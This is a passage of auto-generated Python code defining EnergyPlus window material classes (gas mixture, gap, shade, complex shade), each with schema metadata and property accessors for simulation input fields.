str: the value of `name` or None if not set
"""
return self["Name"]
@name.setter
def name(self, value=None):
"""Corresponds to IDD field `Name`"""
self["Name"] = value
@property
def thickness(self):
"""field `Thickness`
| Units: m
Args:
value (float): value for IDD Field `Thickness`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `thickness` or None if not set
"""
return self["Thickness"]
@thickness.setter
def thickness(self, value=None):
"""Corresponds to IDD field `Thickness`"""
self["Thickness"] = value
@property
def number_of_gases_in_mixture(self):
"""field `Number of Gases in Mixture`
| value >= 1
| value <= 4
Args:
value (int): value for IDD Field `Number of Gases in Mixture`
Raises:
ValueError: if `value` is not a valid value
Returns:
int: the value of `number_of_gases_in_mixture` or None if not set
"""
return self["Number of Gases in Mixture"]
@number_of_gases_in_mixture.setter
def number_of_gases_in_mixture(self, value=None):
"""Corresponds to IDD field `Number of Gases in Mixture`"""
self["Number of Gases in Mixture"] = value
@property
def gas_1_type(self):
"""field `Gas 1 Type`
Args:
value (str): value for IDD Field `Gas 1 Type`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `gas_1_type` or None if not set
"""
return self["Gas 1 Type"]
@gas_1_type.setter
def gas_1_type(self, value=None):
"""Corresponds to IDD field `Gas 1 Type`"""
self["Gas 1 Type"] = value
@property
def gas_1_fraction(self):
"""field `Gas 1 Fraction`
| value <= 1.0
Args:
value (float): value for IDD Field `Gas 1 Fraction`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `gas_1_fraction` or None if not set
"""
return self["Gas 1 Fraction"]
@gas_1_fraction.setter
def gas_1_fraction(self, value=None):
"""Corresponds to IDD field `Gas 1 Fraction`"""
self["Gas 1 Fraction"] = value
@property
def gas_2_type(self):
"""field `Gas 2 Type`
Args:
value (str): value for IDD Field `Gas 2 Type`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `gas_2_type` or None if not set
"""
return self["Gas 2 Type"]
@gas_2_type.setter
def gas_2_type(self, value=None):
"""Corresponds to IDD field `Gas 2 Type`"""
self["Gas 2 Type"] = value
@property
def gas_2_fraction(self):
"""field `Gas 2 Fraction`
| value <= 1.0
Args:
value (float): value for IDD Field `Gas 2 Fraction`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `gas_2_fraction` or None if not set
"""
return self["Gas 2 Fraction"]
@gas_2_fraction.setter
def gas_2_fraction(self, value=None):
"""Corresponds to IDD field `Gas 2 Fraction`"""
self["Gas 2 Fraction"] = value
@property
def gas_3_type(self):
"""field `Gas 3 Type`
Args:
value (str): value for IDD Field `Gas 3 Type`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `gas_3_type` or None if not set
"""
return self["Gas 3 Type"]
@gas_3_type.setter
def gas_3_type(self, value=None):
"""Corresponds to IDD field `Gas 3 Type`"""
self["Gas 3 Type"] = value
@property
def gas_3_fraction(self):
"""field `Gas 3 Fraction`
| value <= 1.0
Args:
value (float): value for IDD Field `Gas 3 Fraction`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `gas_3_fraction` or None if not set
"""
return self["Gas 3 Fraction"]
@gas_3_fraction.setter
def gas_3_fraction(self, value=None):
"""Corresponds to IDD field `Gas 3 Fraction`"""
self["Gas 3 Fraction"] = value
@property
def gas_4_type(self):
"""field `Gas 4 Type`
Args:
value (str): value for IDD Field `Gas 4 Type`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `gas_4_type` or None if not set
"""
return self["Gas 4 Type"]
@gas_4_type.setter
def gas_4_type(self, value=None):
"""Corresponds to IDD field `Gas 4 Type`"""
self["Gas 4 Type"] = value
@property
def gas_4_fraction(self):
"""field `Gas 4 Fraction`
| value <= 1.0
Args:
value (float): value for IDD Field `Gas 4 Fraction`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `gas_4_fraction` or None if not set
"""
return self["Gas 4 Fraction"]
@gas_4_fraction.setter
def gas_4_fraction(self, value=None):
"""Corresponds to IDD field `Gas 4 Fraction`"""
self["Gas 4 Fraction"] = value
class WindowMaterialGap(DataObject):
""" Corresponds to IDD object `WindowMaterial:Gap`
Used to define the gap between two layers in a complex fenestration system, where the
Construction:ComplexFenestrationState object is used. It is referenced as a layer in the
Construction:ComplexFenestrationState object. It cannot be referenced as a layer from the
Construction object.
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'}),
(u'thickness',
{'name': u'Thickness',
'pyname': u'thickness',
'minimum>': 0.0,
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'm'}),
(u'gas (or gas mixture)',
{'name': u'Gas (or Gas Mixture)',
'pyname': u'gas_or_gas_mixture',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'pressure',
{'name': u'Pressure',
'pyname': u'pressure',
'default': 101325.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'Pa'}),
(u'deflection state',
{'name': u'Deflection State',
'pyname': u'deflection_state',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'support pillar',
{'name': u'Support Pillar',
'pyname': u'support_pillar',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'})]),
'format': None,
'group': u'Surface Construction Elements',
'min-fields': 0,
'name': u'WindowMaterial:Gap',
'pyname': u'WindowMaterialGap',
'required-object': False,
'unique-object': False}
@property
def name(self):
"""field `Name`
Args:
value (str): value for IDD Field `Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `name` or None if not set
"""
return self["Name"]
@name.setter
def name(self, value=None):
"""Corresponds to IDD field `Name`"""
self["Name"] = value
@property
def thickness(self):
"""field `Thickness`
| Units: m
Args:
value (float): value for IDD Field `Thickness`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `thickness` or None if not set
"""
return self["Thickness"]
@thickness.setter
def thickness(self, value=None):
"""Corresponds to IDD field `Thickness`"""
self["Thickness"] = value
@property
def gas_or_gas_mixture(self):
"""field `Gas (or Gas Mixture)`
| This field should reference only WindowMaterial:Gas
| or WindowMaterial:GasMixture objects
Args:
value (str): value for IDD Field `Gas (or Gas Mixture)`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `gas_or_gas_mixture` or None if not set
"""
return self["Gas (or Gas Mixture)"]
@gas_or_gas_mixture.setter
def gas_or_gas_mixture(self, value=None):
"""Corresponds to IDD field `Gas (or Gas Mixture)`"""
self["Gas (or Gas Mixture)"] = value
@property
def pressure(self):
"""field `Pressure`
| Units: Pa
| Default value: 101325.0
Args:
value (float): value for IDD Field `Pressure`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `pressure` or None if not set
"""
return self["Pressure"]
@pressure.setter
def pressure(self, value=101325.0):
"""Corresponds to IDD field `Pressure`"""
self["Pressure"] = value
@property
def deflection_state(self):
"""field `Deflection State`
| If left blank, it will be considered that gap is not deflected
Args:
value (str): value for IDD Field `Deflection State`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `deflection_state` or None if not set
"""
return self["Deflection State"]
@deflection_state.setter
def deflection_state(self, value=None):
"""Corresponds to IDD field `Deflection State`"""
self["Deflection State"] = value
@property
def support_pillar(self):
"""field `Support Pillar`
| If left blank, it will be considered that gap does not have
| support pillars
Args:
value (str): value for IDD Field `Support Pillar`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `support_pillar` or None if not set
"""
return self["Support Pillar"]
@support_pillar.setter
def support_pillar(self, value=None):
"""Corresponds to IDD field `Support Pillar`"""
self["Support Pillar"] = value
class WindowMaterialShade(DataObject):
""" Corresponds to IDD object `WindowMaterial:Shade`
Specifies the properties of window shade materials. Reflectance and emissivity
properties are assumed to be the same on both sides of the shade. Shades are considered
to be perfect diffusers (all transmitted and reflected radiation is
hemispherically-diffuse) independent of angle of incidence.
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'}),
(u'solar transmittance',
{'name': u'Solar Transmittance',
'pyname': u'solar_transmittance',
'maximum<': 1.0,
'required-field': True,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'solar reflectance',
{'name': u'Solar Reflectance',
'pyname': u'solar_reflectance',
'maximum<': 1.0,
'required-field': True,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'visible transmittance',
{'name': u'Visible Transmittance',
'pyname': u'visible_transmittance',
'maximum<': 1.0,
'required-field': True,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'visible reflectance',
{'name': u'Visible Reflectance',
'pyname': u'visible_reflectance',
'maximum<': 1.0,
'required-field': True,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'infrared hemispherical emissivity',
{'name': u'Infrared Hemispherical Emissivity',
'pyname': u'infrared_hemispherical_emissivity',
'minimum>': 0.0,
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'maximum<': 1.0,
'unit': u'dimensionless'}),
(u'infrared transmittance',
{'name': u'Infrared Transmittance',
'pyname': u'infrared_transmittance',
'maximum<': 1.0,
'required-field': True,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'thickness',
{'name': u'Thickness',
'pyname': u'thickness',
'minimum>': 0.0,
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'm'}),
(u'conductivity',
{'name': u'Conductivity',
'pyname': u'conductivity',
'minimum>': 0.0,
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'W/m-K'}),
(u'shade to glass distance',
{'name': u'Shade to Glass Distance',
'pyname': u'shade_to_glass_distance',
'default': 0.05,
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.001,
'autocalculatable': False,
'type': u'real',
'unit': u'm'}),
(u'top opening multiplier',
{'name': u'Top Opening Multiplier',
'pyname': u'top_opening_multiplier',
'default': 0.5,
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'}),
(u'bottom opening multiplier',
{'name': u'Bottom Opening Multiplier',
'pyname': u'bottom_opening_multiplier',
'default': 0.5,
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'}),
(u'left-side opening multiplier',
{'name': u'Left-Side Opening Multiplier',
'pyname': u'leftside_opening_multiplier',
'default': 0.5,
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'}),
(u'right-side opening multiplier',
{'name': u'Right-Side Opening Multiplier',
'pyname': u'rightside_opening_multiplier',
'default': 0.5,
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'}),
(u'airflow permeability',
{'name': u'Airflow Permeability',
'pyname': u'airflow_permeability',
'default': 0.0,
'maximum': 0.8,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'})]),
'format': None,
'group': u'Surface Construction Elements',
'min-fields': 15,
'name': u'WindowMaterial:Shade',
'pyname': u'WindowMaterialShade',
'required-object': False,
'unique-object': False}
@property
def name(self):
"""field `Name`
Args:
value (str): value for IDD Field `Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `name` or None if not set
"""
return self["Name"]
@name.setter
def name(self, value=None):
"""Corresponds to IDD field `Name`"""
self["Name"] = value
@property
def solar_transmittance(self):
"""field `Solar Transmittance`
| Assumed independent of incidence angle
| Units: dimensionless
| value < 1.0
Args:
value (float): value for IDD Field `Solar Transmittance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `solar_transmittance` or None if not set
"""
return self["Solar Transmittance"]
@solar_transmittance.setter
def solar_transmittance(self, value=None):
"""Corresponds to IDD field `Solar Transmittance`"""
self["Solar Transmittance"] = value
@property
def solar_reflectance(self):
"""field `Solar Reflectance`
| Assumed same for both sides
| Assumed independent of incidence angle
| Units: dimensionless
| value < 1.0
Args:
value (float): value for IDD Field `Solar Reflectance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `solar_reflectance` or None if not set
"""
return self["Solar Reflectance"]
@solar_reflectance.setter
def solar_reflectance(self, value=None):
"""Corresponds to IDD field `Solar Reflectance`"""
self["Solar Reflectance"] = value
@property
def visible_transmittance(self):
"""field `Visible Transmittance`
| Assumed independent of incidence angle
| Units: dimensionless
| value < 1.0
Args:
value (float): value for IDD Field `Visible Transmittance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `visible_transmittance` or None if not set
"""
return self["Visible Transmittance"]
@visible_transmittance.setter
def visible_transmittance(self, value=None):
"""Corresponds to IDD field `Visible Transmittance`"""
self["Visible Transmittance"] = value
@property
def visible_reflectance(self):
"""field `Visible Reflectance`
| Assumed same for both sides
| Assumed independent of incidence angle
| Units: dimensionless
| value < 1.0
Args:
value (float): value for IDD Field `Visible Reflectance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `visible_reflectance` or None if not set
"""
return self["Visible Reflectance"]
@visible_reflectance.setter
def visible_reflectance(self, value=None):
"""Corresponds to IDD field `Visible Reflectance`"""
self["Visible Reflectance"] = value
@property
def infrared_hemispherical_emissivity(self):
"""field `Infrared Hemispherical Emissivity`
| Units: dimensionless
| value < 1.0
Args:
value (float): value for IDD Field `Infrared Hemispherical Emissivity`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `infrared_hemispherical_emissivity` or None if not set
"""
return self["Infrared Hemispherical Emissivity"]
@infrared_hemispherical_emissivity.setter
def infrared_hemispherical_emissivity(self, value=None):
"""Corresponds to IDD field `Infrared Hemispherical Emissivity`"""
self["Infrared Hemispherical Emissivity"] = value
@property
def infrared_transmittance(self):
"""field `Infrared Transmittance`
| Units: dimensionless
| value < 1.0
Args:
value (float): value for IDD Field `Infrared Transmittance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `infrared_transmittance` or None if not set
"""
return self["Infrared Transmittance"]
@infrared_transmittance.setter
def infrared_transmittance(self, value=None):
"""Corresponds to IDD field `Infrared Transmittance`"""
self["Infrared Transmittance"] = value
@property
def thickness(self):
"""field `Thickness`
| Units: m
| IP-Units: in
Args:
value (float): value for IDD Field `Thickness`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `thickness` or None if not set
"""
return self["Thickness"]
@thickness.setter
def thickness(self, value=None):
"""Corresponds to IDD field `Thickness`"""
self["Thickness"] = value
@property
def conductivity(self):
"""field `Conductivity`
| Units: W/m-K
Args:
value (float): value for IDD Field `Conductivity`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `conductivity` or None if not set
"""
return self["Conductivity"]
@conductivity.setter
def conductivity(self, value=None):
"""Corresponds to IDD field `Conductivity`"""
self["Conductivity"] = value
@property
def shade_to_glass_distance(self):
"""field `Shade to Glass Distance`
| Units: m
| IP-Units: in
| Default value: 0.05
| value >= 0.001
| value <= 1.0
Args:
value (float): value for IDD Field `Shade to Glass Distance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `shade_to_glass_distance` or None if not set
"""
return self["Shade to Glass Distance"]
@shade_to_glass_distance.setter
def shade_to_glass_distance(self, value=0.05):
"""Corresponds to IDD field `Shade to Glass Distance`"""
self["Shade to Glass Distance"] = value
@property
def top_opening_multiplier(self):
"""field `Top Opening Multiplier`
| Default value: 0.5
| value <= 1.0
Args:
value (float): value for IDD Field `Top Opening Multiplier`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `top_opening_multiplier` or None if not set
"""
return self["Top Opening Multiplier"]
@top_opening_multiplier.setter
def top_opening_multiplier(self, value=0.5):
"""Corresponds to IDD field `Top Opening Multiplier`"""
self["Top Opening Multiplier"] = value
@property
def bottom_opening_multiplier(self):
"""field `Bottom Opening Multiplier`
| Default value: 0.5
| value <= 1.0
Args:
value (float): value for IDD Field `Bottom Opening Multiplier`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `bottom_opening_multiplier` or None if not set
"""
return self["Bottom Opening Multiplier"]
@bottom_opening_multiplier.setter
def bottom_opening_multiplier(self, value=0.5):
"""Corresponds to IDD field `Bottom Opening Multiplier`"""
self["Bottom Opening Multiplier"] = value
@property
def leftside_opening_multiplier(self):
"""field `Left-Side Opening Multiplier`
| Default value: 0.5
| value <= 1.0
Args:
value (float): value for IDD Field `Left-Side Opening Multiplier`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `leftside_opening_multiplier` or None if not set
"""
return self["Left-Side Opening Multiplier"]
@leftside_opening_multiplier.setter
def leftside_opening_multiplier(self, value=0.5):
""" Corresponds to IDD field `Left-Side Opening Multiplier`
"""
self["Left-Side Opening Multiplier"] = value
@property
def rightside_opening_multiplier(self):
"""field `Right-Side Opening Multiplier`
| Default value: 0.5
| value <= 1.0
Args:
value (float): value for IDD Field `Right-Side Opening Multiplier`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `rightside_opening_multiplier` or None if not set
"""
return self["Right-Side Opening Multiplier"]
@rightside_opening_multiplier.setter
def rightside_opening_multiplier(self, value=0.5):
""" Corresponds to IDD field `Right-Side Opening Multiplier`
"""
self["Right-Side Opening Multiplier"] = value
@property
def airflow_permeability(self):
"""field `Airflow Permeability`
| Units: dimensionless
| value <= 0.8
Args:
value (float): value for IDD Field `Airflow Permeability`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `airflow_permeability` or None if not set
"""
return self["Airflow Permeability"]
@airflow_permeability.setter
def airflow_permeability(self, value=None):
"""Corresponds to IDD field `Airflow Permeability`"""
self["Airflow Permeability"] = value
class WindowMaterialComplexShade(DataObject):
""" Corresponds to IDD object `WindowMaterial:ComplexShade`
Complex window shading layer thermal properties
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'}),
(u'layer type',
{'name': u'Layer Type',
'pyname': u'layer_type',
'default': u'OtherShadingType',
'required-field': False,
'autosizable': False,
'accepted-values': [u'Venetian',
u'Woven',
u'Perforated',
u'BSDF',
u'OtherShadingType'],
'autocalculatable': False,
'type': 'alpha'}),
(u'thickness',
{'name': u'Thickness',
'pyname': u'thickness',
'default': 0.002,
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'm'}),
(u'conductivity',
{'name': u'Conductivity',
'pyname': u'conductivity',
'default': 1.0,
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'W/m-K'}),
(u'ir transmittance',
{'name': u'IR Transmittance',
'pyname': u'ir_transmittance',
'default': 0.0,
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'}),
(u'front emissivity',
{'name': u'Front Emissivity',
'pyname': u'front_emissivity',
'default': 0.84,
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'}),
(u'back emissivity',
{'name': u'Back Emissivity',
'pyname': u'back_emissivity',
'default': 0.84,
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'}),
(u'top opening multiplier',
{'name': u'Top Opening Multiplier',
'pyname': u'top_opening_multiplier',
'default': 0.0,
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'}),
(u'bottom opening multiplier',
{'name': u'Bottom Opening Multiplier',
'pyname': u'bottom_opening_multiplier',
'default': 0.0,
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'}),
(u'left side opening multiplier',
{'name': u'Left Side Opening Multiplier',
'pyname': u'left_side_opening_multiplier',
'default': 0.0,
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'}),
(u'right side opening multiplier',
{'name': u'Right Side Opening Multiplier',
'pyname': u'right_side_opening_multiplier',
'default': 0.0,
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'}),
(u'front opening multiplier',
{'name': u'Front Opening Multiplier',
'pyname': u'front_opening_multiplier',
'default': 0.05,
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'}),
(u'slat width',
{'name': u'Slat Width',
'pyname': u'slat_width',
'default': 0.016,
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'm'}),
(u'slat spacing',
{'name': u'Slat Spacing',
'pyname': u'slat_spacing',
'default': 0.012,
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'm'}),
(u'slat thickness',
{'name': u'Slat Thickness',
'pyname': u'slat_thickness',
'default': 0.0006,
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'm'}),
(u'slat angle',
{'name': u'Slat Angle',
'pyname': u'slat_angle',
'default': 90.0,
'maximum': 90.0,
'required-field': False,
'autosizable': False,
'minimum': -90.0,
'autocalculatable': False,
'type': u'real',
'unit': u'deg'}),
(u'slat conductivity',
{'name': u'Slat Conductivity',
'pyname': u'slat_conductivity',
'default': 160.0,
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'W/m-K'}),
(u'slat curve',
{'name': u'Slat Curve',
'pyname': u'slat_curve',
'default': 0.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'm'})]),
'format': None,
'group': u'Surface Construction Elements',
'min-fields': 12,
'name': u'WindowMaterial:ComplexShade',
'pyname': u'WindowMaterialComplexShade',
'required-object': False,
'unique-object': False}
@property
def name(self):
"""field `Name`
Args:
value (str): value for IDD Field `Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `name` or None if not set
"""
return self["Name"]
@name.setter
def name(self, value=None):
"""Corresponds to IDD field `Name`"""
self["Name"] = value
@property
def layer_type(self):
"""field `Layer Type`
| Default value: OtherShadingType
Args:
value (str): value for IDD Field `Layer Type`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `layer_type` or None if not set
"""
return self["Layer Type"]
@layer_type.setter
def layer_type(self, value="OtherShadingType"):
"""Corresponds to IDD field `Layer Type`"""
self["Layer Type"] = value
@property
def thickness(self):
"""field `Thickness`
| Units: m
| Default value: 0.002
Args:
value (float): value for IDD Field `Thickness`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `thickness` or None if not set
"""
return self["Thickness"]
@thickness.setter
def thickness(self, value=0.002):
"""Corresponds to IDD field `Thickness`"""
self["Thickness"] = value
@property
def conductivity(self):
"""field `Conductivity`
| Units: W/m-K
| Default value: 1.0
Args:
value (float): value for IDD Field `Conductivity`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `conductivity` or None if not set
"""
return self["Conductivity"]
@conductivity.setter
def conductivity(self, value=1.0):
"""Corresponds to IDD field `Conductivity`"""
self["Conductivity"] = value
@property
def ir_transmittance(self):
"""field `IR Transmittance`
| value <= 1.0
Args:
value (float): value for IDD Field `IR Transmittance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `ir_transmittance` or None if not set
"""
return self["IR Transmittance"]
@ir_transmittance.setter
def ir_transmittance(self, value=None):
"""Corresponds to IDD field `IR Transmittance`"""
self["IR Transmittance"] = value
@property
def front_emissivity(self):
"""field `Front Emissivity`
| Default value: 0.84
| value <= 1.0
Args:
value (float): value for IDD Field `Front Emissivity`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `front_emissivity` or None if not set
"""
return self["Front Emissivity"]
@front_emissivity.setter
def front_emissivity(self, value=0.84):
"""Corresponds to IDD field `Front Emissivity`"""
self["Front Emissivity"] = value
@property
def back_emissivity(self):
"""field `Back Emissivity`
| Default value: 0.84
| value <= 1.0
Args:
value (float): value for IDD Field `Back Emissivity`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `back_emissivity` or None if not set
"""
return self["Back Emissivity"]
@back_emissivity.setter
def back_emissivity(self, value=0.84):
"""Corresponds to IDD field `Back Emissivity`"""
self["Back Emissivity"] = value
@property
def top_opening_multiplier(self):
"""field `Top Opening Multiplier`
| value <= 1.0
Args:
value (float): value for IDD Field `Top Opening Multiplier`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `top_opening_multiplier` or None if not set
"""
return self["Top Opening Multiplier"]
@top_opening_multiplier.setter
def top_opening_multiplier(self, value=None):
"""Corresponds to IDD field `Top Opening Multiplier`"""
self["Top Opening Multiplier"] = value
@property
def bottom_opening_multiplier(self):
"""field `Bottom Opening Multiplier`
| value <= 1.0
Args:
value (float): value for IDD Field `Bottom Opening Multiplier`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `bottom_opening_multiplier` or None if not set
"""
return self["Bottom Opening Multiplier"]
@bottom_opening_multiplier.setter
def bottom_opening_multiplier(self, value=None):
"""Corresponds to IDD field `Bottom Opening Multiplier`"""
self["Bottom Opening Multiplier"] = value
@property
def left_side_opening_multiplier(self):
"""field `Left Side Opening Multiplier`
| value <= 1.0
Args:
value (float): value for IDD Field `Left Side Opening Multiplier`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `left_side_opening_multiplier` or None if not set
"""
return self["Left Side Opening Multiplier"]
@left_side_opening_multiplier.setter
def left_side_opening_multiplier(self, value=None):
"""Corresponds to IDD field `Left Side Opening Multiplier`"""
self["Left Side Opening Multiplier"] = value
@property
def right_side_opening_multiplier(self):
"""field `Right Side Opening Multiplier`
| value <= 1.0
Args:
value (float): value for IDD Field `Right Side Opening Multiplier`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `right_side_opening_multiplier` or None if not set
"""
return self["Right Side Opening Multiplier"]
@right_side_opening_multiplier.setter
def right_side_opening_multiplier(self, value=None):
"""Corresponds to IDD field `Right Side Opening Multiplier`"""
self["Right Side Opening Multiplier"] = value
@property
def front_opening_multiplier(self):
"""field `Front Opening Multiplier`
| Default value: 0.05
| value <= 1.0
Args:
value (float): value for IDD Field `Front Opening Multiplier`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `front_opening_multiplier` or None if not set
"""
return self["Front Opening Multiplier"]
@front_opening_multiplier.setter
def front_opening_multiplier(self, value=0.05):
"""Corresponds to IDD field `Front Opening Multiplier`"""
self["Front Opening Multiplier"] = value
@property
def slat_width(self):
"""field `Slat Width`
| Units: m
| Default value: 0.016
Args:
value (float): value for IDD Field `Slat Width`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `slat_width` or None if not set
"""
return self["Slat Width"]
@slat_width.setter
def slat_width(self, value=0.016):
"""Corresponds to IDD field `Slat Width`"""
self["Slat Width"] = value
@property
def slat_spacing(self):
"""field `Slat Spacing`
| Distance between adjacent slat faces
| Units: m
| Default value: 0.012
Args:
value (float): value for IDD Field `Slat Spacing`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `slat_spacing` or None if not set
"""
return self["Slat Spacing"]
@slat_spacing.setter
def slat_spacing(self, value=0.012):
"""Corresponds to IDD field `Slat Spacing`"""
self["Slat Spacing"] = value
@property
def slat_thickness(self):
"""field `Slat Thickness`
| Distance between top and bottom surfaces of slat
| Slat is assumed to be rectangular in cross section and flat
| Units: m
| Default value: 0.0006
Args:
value (float): value for IDD Field `Slat Thickness`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `slat_thickness` or None if not set
"""
return self["Slat Thickness"]
@slat_thickness.setter
def slat_thickness(self, value=0.0006):
"""Corresponds to IDD field `Slat Thickness`"""
self["Slat Thickness"] = value
@property
def slat_angle(self):
"""field `Slat Angle`
| Units: deg
| Default value: 90.0
| value >= -90.0
| value <= 90.0
Args:
value (float): value for IDD Field `Slat Angle`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `slat_angle` or None if not set
"""
return self["Slat Angle"]
@slat_angle.setter
def slat_angle(self, value=90.0):
"""Corresponds to IDD field `Slat Angle`"""
self["Slat Angle"] = value
@property
def slat_conductivity(self):
"""field `Slat Conductivity`
| Units: W/m-K
| Default value: 160.0
Args:
value (float): value for IDD Field `Slat Conductivity`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `slat_conductivity` or None if not set
"""
return self["Slat Conductivity"]
@slat_conductivity.setter
def slat_conductivity(self, value=160.0):
"""Corresponds to IDD field `Slat Conductivity`"""
self["Slat Conductivity"] = value
@property
def slat_curve(self):
"""field `Slat Curve`
| this value represents curvature radius of the slat.
| if the slat is flat use zero.
| if this value is not zero, then it must be > SlatWidth/2.
| Units: m
Args:
value (float): value for IDD Field `Slat Curve`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `slat_curve` or None if not set
"""
return self["Slat Curve"]
@slat_curve.setter
def slat_curve(self, value=None):
"""Corresponds to IDD field `Slat Curve`"""
self["Slat Curve"] = value
class WindowMaterialBlind(DataObject):
""" Corresponds to IDD object `WindowMaterial:Blind`
